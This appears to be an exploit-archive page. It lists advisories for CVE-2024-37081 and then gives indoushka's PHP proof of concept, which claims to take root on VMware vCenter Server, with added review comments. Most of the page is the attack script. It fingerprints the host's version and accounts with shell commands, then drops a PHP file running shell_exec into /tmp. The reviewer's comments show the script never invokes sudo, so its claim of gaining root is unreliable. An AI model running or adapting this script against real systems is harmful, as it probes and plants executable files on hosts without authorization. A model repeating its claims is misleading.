| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for ASP.NET Misconfiguration: Use of Identity Impersonation in Vmware Vcenter_Server | 9 Jul 2024 16:14 | – | githubexploit | |
| Security Bulletin: Multiple Vulnerabilities in VMware vCenter affect Cloud Pak System [CVE-2024-37079, CVE-2024-37080, CVE-2024-37081] | 3 May 2025 23:46 | – | ibm | |
| CVE-2024-37081 | 18 Jun 2024 10:56 | – | circl | |
| VMware vCenter Server Security Vulnerability | 18 Jun 2024 00:00 | – | cnnvd | |
| CVE-2024-37081 | 18 Jun 2024 05:43 | – | cve | |
| CVE-2024-37081 | 18 Jun 2024 05:43 | – | cvelist | |
| Broadcom Advises Urgent Patch for Severe VMware vCenter Server Vulnerabilities | 19 Jun 2024 14:39 | – | hackread | |
| vCenter Sudo Privilege Escalation | 5 Dec 2024 18:56 | – | metasploit | |
| Vulnerabilities fixed in VMware vCenter | 18 Jun 2024 11:46 | – | ncsc | |
| CVE-2024-37081 | 18 Jun 2024 06:15 | – | nvd | |
=============================================================================================================================================
| # Title : VMware vCenter Server v 8.0.2 Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.vmware.com |
=============================================================================================================================================
POC :
[+] Dorking In Google Or Other Search Engine.
[+] Code Description: Exploiting a Vulnerability in VMware vCenter Server to Gain Root Privileges
This script is written in PHP and targets a flaw in the sudo configuration
that allows low-privileged users to gain root privileges.
(Related : https://packetstorm.news/files/id/182981/ Related CVE numbers: CVE-2024-37081 ) .
[+] save code as poc.php.
[+] PayLoad :
<?php
/**
*
* @author Indoushka
*/
/**
 * Proof-of-concept class from an advisory that relates itself to
 * CVE-2024-37081 (sudo misconfiguration in VMware vCenter Server).
 *
 * Reading the class as written:
 *  - it reads a version string from a local file and compares it with two
 *    build ceilings (7.0.3 build 24026615 and 8.0.2 build 23929136);
 *  - it collects the current account name and its groups via shell commands;
 *  - it dispatches to one of three handlers. Two of them only print a
 *    message; the third writes a one-line PHP file into the writable
 *    directory. No handler invokes sudo, so the class on its own does not
 *    change privileges.
 *
 * For triage: the accounts (infraprofile, vpxd, sts, pod) and groups
 * (operator, admin) tested in check() are the principals the author treats
 * as affected, and the only filesystem artefact is a file with a
 * 10-hex-character name in the writable directory (default /tmp).
 *
 * NOTE(review): the Windows branches are unlikely to apply to the 7.x/8.x
 * builds checked here, which as far as I know ship only as a Linux
 * appliance — confirm against vendor documentation.
 *
 * @author Indoushka
 */
class VCenterExploit
{
    /** Directory tested for writability and used for the dropped file. */
    private $writableDir;

    /** Stored by the constructor; no method of this class reads it. */
    private $timeout;

    /** Account name as printed by `whoami`. */
    private $user;

    /** Output of the group listing command, split on single spaces. */
    private $groups;

    /** True when PHP reports the Windows OS family. */
    private $isWindows;

    /**
     * @param string $writableDir Directory the class may write into.
     * @param int    $timeout     Kept on the instance but otherwise unused.
     */
    public function __construct($writableDir = '/tmp', $timeout = 30)
    {
        $this->isWindows = (PHP_OS_FAMILY === 'Windows');
        $this->timeout = $timeout;
        $this->writableDir = $writableDir;
    }

    /**
     * Run a command through the shell and hand back its output; on Windows
     * the command is wrapped in `cmd /c`.
     *
     * The command string is interpolated without quoting. Every caller in
     * this class passes a fixed literal.
     *
     * @return string|false|null Whatever shell_exec() returns.
     */
    private function executeCommand($command)
    {
        $commandLine = $this->isWindows ? "cmd /c $command" : $command;

        return shell_exec($commandLine);
    }

    /**
     * Report whether the given directory is writable.
     */
    private function isWritable($dir)
    {
        return is_writable($dir);
    }

    /**
     * Read the vCenter version string from a file instead of shelling out.
     *
     * Returns a fixed Arabic "unable to determine the vCenter version"
     * message on Windows or when the file is absent.
     *
     * NOTE(review): the path is taken as-is from the PoC; whether the
     * appliance actually provides this file is not shown here — confirm.
     */
    private function getVCenterBuild()
    {
        $versionFile = "/etc/vcenter_version"; // Linux path
        if ($this->isWindows || !file_exists($versionFile)) {
            return "غير قادر على تحديد إصدار vCenter";
        }

        return file_get_contents($versionFile);
    }

    /**
     * Populate $user and $groups from `whoami` and `groups`
     * (`whoami /groups` on Windows).
     */
    private function refreshIdentity()
    {
        $groupCommand = $this->isWindows ? 'whoami /groups' : 'groups';

        $this->user = trim($this->executeCommand('whoami'));
        $this->groups = explode(' ', trim($this->executeCommand($groupCommand)));
    }

    /**
     * Decide whether the host and the current account fall inside the range
     * the PoC considers affected.
     *
     * The version string must look like "X.Y.Z build N" (separator may be a
     * dash or a space); it is normalised to "X.Y.Z.N" and must be above 7.0.0
     * and below 7.0.3.24026615, or above 8.0.0 and below 8.0.2.23929136.
     * The account must then be one of the four listed service accounts or a
     * member of the operator/admin groups.
     *
     * @return string Human-readable verdict (Arabic); never a boolean.
     */
    private function check()
    {
        $vbuild = $this->getVCenterBuild();

        $matches = [];
        if (preg_match('/(\d+\.\d+\.\d+) build[- ](\d+)/i', $vbuild, $matches) !== 1) {
            return "غير قادر على تحديد إصدار vCenter من الإخراج: $vbuild";
        }

        $version = $matches[1] . '.' . $matches[2];

        $inSevenRange = version_compare($version, '7.0.0', '>')
            && version_compare($version, '7.0.3.24026615', '<');
        $inEightRange = version_compare($version, '8.0.0', '>')
            && version_compare($version, '8.0.2.23929136', '<');

        if (!($inSevenRange || $inEightRange)) {
            return "الإصدار غير قابل للاستغلال: $vbuild";
        }

        $this->refreshIdentity();

        $isListedAccount = in_array($this->user, ['infraprofile', 'vpxd', 'sts', 'pod']);
        $listedGroups = array_intersect(['operator', 'admin'], $this->groups);

        if ($isListedAccount || $listedGroups) {
            return "الإصدار $version والمستخدم ($this->user: " . implode(',', $this->groups) . ") قابل للاستغلال";
        }

        return "المستخدم غير معرض للخطر أو ليس في المجموعة الصحيحة.";
    }

    /**
     * Public entry point for check().
     *
     * @return string The verdict message produced by check().
     */
    public function isVulnerable()
    {
        return $this->check();
    }

    /**
     * Dispatch to a handler according to the current account or group.
     *
     * Terminates the script with die() when the directory is not writable or
     * when no handler matches. The version verdict from check() is not
     * consulted here.
     */
    public function exploit()
    {
        if (!$this->isWritable($this->writableDir)) {
            die("الدليل غير قابل للكتابة: $this->writableDir");
        }

        $this->refreshIdentity();

        if ($this->user == 'pod') {
            $this->exploitPodUser();
            return;
        }

        if (in_array('operator', $this->groups)) {
            $this->exploitOperatorGroup();
            return;
        }

        if (in_array('admin', $this->groups)) {
            $this->exploitAdminGroup();
            return;
        }

        die("المستخدم غير معرض للخطر أو ليس في المجموعة الصحيحة.");
    }

    /**
     * Handler for members of the 'operator' group.
     *
     * Writes a one-line PHP file under a random 10-hex-character name in the
     * writable directory and prints its path. The result of the write is not
     * checked, and nothing in this class executes the file afterwards.
     */
    private function exploitOperatorGroup()
    {
        $fileName = bin2hex(random_bytes(5));
        $payloadPath = "$this->writableDir/" . $fileName;

        file_put_contents($payloadPath, "<?php echo shell_exec('id'); ?>");

        echo "تم رفع الحمولة إلى $payloadPath";
    }

    /**
     * Handler for the 'pod' account; prints a message and does nothing else.
     */
    private function exploitPodUser()
    {
        echo "استغلال المستخدم pod";
    }

    /**
     * Handler for members of the 'admin' group; prints a message and does
     * nothing else.
     */
    private function exploitAdminGroup()
    {
        echo "استغلال مجموعة المسؤولين";
    }
}
// Driver: build the object with its defaults ('/tmp', 30), print the verdict
// string from the version/account check, then call exploit(). The verdict is
// only echoed, never inspected, so exploit() runs whatever the check reported.
$exploit = new VCenterExploit();
$verdict = $exploit->isVulnerable();
echo $verdict;
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================